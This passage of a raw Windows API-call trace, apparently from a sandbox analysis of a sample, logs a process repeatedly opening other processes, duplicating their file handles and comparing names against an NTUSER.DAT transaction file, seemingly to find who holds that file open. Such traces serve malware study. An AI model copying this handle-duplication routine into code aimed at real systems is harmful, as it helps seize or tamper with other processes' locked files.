dwProcessId=0x340) returned 0x62c [0155.145] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.145] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.146] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.146] CloseHandle (hObject=0x670) returned 1 [0155.146] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.146] CloseHandle (hObject=0x680) returned 1 [0155.146] CloseHandle (hObject=0x62c) returned 1 [0155.146] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0155.146] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.147] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.147] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.148] CloseHandle (hObject=0x670) returned 1 [0155.148] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.148] CloseHandle (hObject=0x680) returned 1 [0155.148] CloseHandle (hObject=0x62c) returned 1 [0155.148] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0155.148] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.149] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.149] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.149] CloseHandle (hObject=0x670) returned 1 [0155.149] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.149] CloseHandle (hObject=0x680) returned 1 [0155.149] CloseHandle (hObject=0x62c) returned 1 [0155.150] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0155.150] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.150] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.152] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.152] CloseHandle (hObject=0x670) returned 1 [0155.153] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.153] CloseHandle (hObject=0x680) returned 1 [0155.153] CloseHandle (hObject=0x62c) returned 1 [0155.153] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0155.153] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.153] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.154] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.154] CloseHandle (hObject=0x670) returned 1 [0155.154] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.154] CloseHandle (hObject=0x680) returned 1 [0155.154] CloseHandle (hObject=0x62c) returned 1 [0155.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0155.154] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.155] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.157] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.157] CloseHandle (hObject=0x670) returned 1 [0155.157] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.157] CloseHandle (hObject=0x680) returned 1 [0155.157] CloseHandle (hObject=0x62c) returned 1 [0155.158] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0155.158] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.158] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.159] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.159] CloseHandle (hObject=0x670) returned 1 [0155.159] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.159] CloseHandle (hObject=0x680) returned 1 [0155.159] CloseHandle (hObject=0x62c) returned 1 [0155.159] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0155.159] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.160] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.160] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.161] CloseHandle (hObject=0x670) returned 1 [0155.161] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.161] CloseHandle (hObject=0x680) returned 1 [0155.161] CloseHandle (hObject=0x62c) returned 1 [0155.161] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0155.161] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.161] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.162] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.162] CloseHandle (hObject=0x670) returned 1 [0155.162] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.162] CloseHandle (hObject=0x680) returned 1 [0155.162] CloseHandle (hObject=0x62c) returned 1 [0155.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0155.162] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.163] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.164] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.164] CloseHandle (hObject=0x670) returned 1 [0155.164] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.164] CloseHandle (hObject=0x680) returned 1 [0155.164] CloseHandle (hObject=0x62c) returned 1 [0155.164] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0155.164] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.164] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.165] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.165] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.165] CloseHandle (hObject=0x670) returned 1 [0155.165] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.165] CloseHandle (hObject=0x680) returned 1 [0155.165] CloseHandle (hObject=0x62c) returned 1 [0155.165] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0155.166] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.166] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.167] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.167] CloseHandle (hObject=0x670) returned 1 [0155.167] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.167] CloseHandle (hObject=0x680) returned 1 [0155.167] CloseHandle (hObject=0x62c) returned 1 [0155.167] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0155.167] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.168] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.168] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.168] CloseHandle (hObject=0x670) returned 1 [0155.169] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.169] CloseHandle (hObject=0x680) returned 1 [0155.169] CloseHandle (hObject=0x62c) returned 1 [0155.169] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0155.169] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.169] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.170] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.170] CloseHandle (hObject=0x670) returned 1 [0155.170] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.170] CloseHandle (hObject=0x680) returned 1 [0155.170] CloseHandle (hObject=0x62c) returned 1 [0155.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0155.170] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.171] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.173] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.174] CloseHandle (hObject=0x670) returned 1 [0155.174] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.174] CloseHandle (hObject=0x680) returned 1 [0155.174] CloseHandle (hObject=0x62c) returned 1 [0155.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0155.174] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.175] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.175] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.175] CloseHandle (hObject=0x670) returned 1 [0155.175] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.175] CloseHandle (hObject=0x680) returned 1 [0155.175] CloseHandle (hObject=0x62c) returned 1 [0155.175] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0155.176] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.176] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.177] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.177] CloseHandle (hObject=0x670) returned 1 [0155.177] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.177] CloseHandle (hObject=0x680) returned 1 [0155.177] CloseHandle (hObject=0x62c) returned 1 [0155.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0155.177] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.178] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.178] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.178] CloseHandle (hObject=0x670) returned 1 [0155.178] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.178] CloseHandle (hObject=0x680) returned 1 [0155.178] CloseHandle (hObject=0x62c) returned 1 [0155.178] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0155.179] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.179] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.180] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.180] CloseHandle (hObject=0x670) returned 1 [0155.180] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.180] CloseHandle (hObject=0x680) returned 1 [0155.180] CloseHandle (hObject=0x62c) returned 1 [0155.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0155.180] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.181] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.181] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.182] CloseHandle (hObject=0x670) returned 1 [0155.182] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.182] CloseHandle (hObject=0x680) returned 1 [0155.182] CloseHandle (hObject=0x62c) returned 1 [0155.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0155.182] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.182] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.183] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.183] CloseHandle (hObject=0x670) returned 1 [0155.183] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.183] CloseHandle (hObject=0x680) returned 1 [0155.183] CloseHandle (hObject=0x62c) returned 1 [0155.183] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0155.183] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.183] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.184] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.185] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.185] CloseHandle (hObject=0x670) returned 1 [0155.185] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.185] CloseHandle (hObject=0x680) returned 1 [0155.185] CloseHandle (hObject=0x62c) returned 1 [0155.185] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0155.185] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.185] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.186] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.186] CloseHandle (hObject=0x670) returned 1 [0155.186] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.186] CloseHandle (hObject=0x680) returned 1 [0155.186] CloseHandle (hObject=0x62c) returned 1 [0155.186] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0155.186] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.187] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.188] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.188] CloseHandle (hObject=0x670) returned 1 [0155.189] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.189] CloseHandle (hObject=0x680) returned 1 [0155.189] CloseHandle (hObject=0x62c) returned 1 [0155.189] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0155.189] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.189] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.191] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.192] CloseHandle (hObject=0x670) returned 1 [0155.192] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0155.192] CloseHandle (hObject=0x680) returned 1 [0155.192] CloseHandle (hObject=0x62c) returned 1 [0155.192] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 